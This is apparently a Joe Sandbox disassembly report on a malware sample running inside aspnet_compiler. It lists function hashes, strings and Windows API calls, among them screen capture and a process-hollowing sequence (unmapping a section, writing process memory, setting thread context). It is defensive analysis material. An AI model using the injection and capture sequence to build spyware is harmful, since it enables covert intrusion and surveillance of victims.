                                                          • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                          • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                          • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                          • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                          • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                          • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                          • String ID:
                                                          • API String ID: 1663032902-0
                                                          • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                          • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                          • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                          • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                          • String ID:
                                                          • API String ID: 2692324296-0
                                                          • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                          • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                          • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                          • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                          • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                          • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                          • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                          APIs
                                                            • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                          • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                          • String ID:
                                                          • API String ID: 1272433827-0
                                                          • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                          • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                          • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                          • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                          APIs
                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                          • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                          • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                          • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                          • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                          APIs
                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID:
                                                          • API String ID: 2299586839-0
                                                          • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                          • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                          • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                          • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                          • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                          • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                          • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                          • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                          • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                          • Instruction Fuzzy Hash:
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BG3i@
                                                          • API String ID: 0-2407888476
                                                          • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                          • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                          • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                          • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0
                                                          • API String ID: 0-4108050209
                                                          • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                          • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                          • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                          • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                          • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                          • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapProcess
                                                          • String ID:
                                                          • API String ID: 54951025-0
                                                          • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                          • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                          • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                          • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                          • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                          • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                          • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                          • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                          • Opcode Fuzzy Hash: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                          • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                          • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                          • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                          • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                          • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                          • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                          • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                          • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                          • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                          • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                          • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                          • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                          • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                          • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                          • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                          • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                          • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                          • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                          • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                          • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                          • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                          • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                          APIs
                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                            • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                          • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                          • DeleteDC.GDI32(?), ref: 0041805D
                                                          • DeleteDC.GDI32(00000000), ref: 00418060
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                          • GetIconInfo.USER32(?,?), ref: 004180CB
                                                          • DeleteObject.GDI32(?), ref: 004180FA
                                                          • DeleteObject.GDI32(?), ref: 00418107
                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                          • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                          • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                          • DeleteDC.GDI32(?), ref: 0041827F
                                                          • DeleteDC.GDI32(00000000), ref: 00418282
                                                          • DeleteObject.GDI32(00000000), ref: 00418285
                                                          • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                          • DeleteObject.GDI32(00000000), ref: 00418344
                                                          • GlobalFree.KERNEL32(?), ref: 0041834B
                                                          • DeleteDC.GDI32(?), ref: 0041835B
                                                          • DeleteDC.GDI32(00000000), ref: 00418366
                                                          • DeleteDC.GDI32(?), ref: 00418398
                                                          • DeleteDC.GDI32(00000000), ref: 0041839B
                                                          • DeleteObject.GDI32(?), ref: 004183A1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                          • String ID: DISPLAY
                                                          • API String ID: 1765752176-865373369
                                                          • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                          • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                          • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                          • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                          • ResumeThread.KERNEL32(?), ref: 00417582
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                          • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                          • GetLastError.KERNEL32 ref: 004175C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                          • API String ID: 4188446516-108836778
                                                          • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                          • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                          • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                          • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                          • ExitProcess.KERNEL32 ref: 0041151D
                                                            • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                            • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                            • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
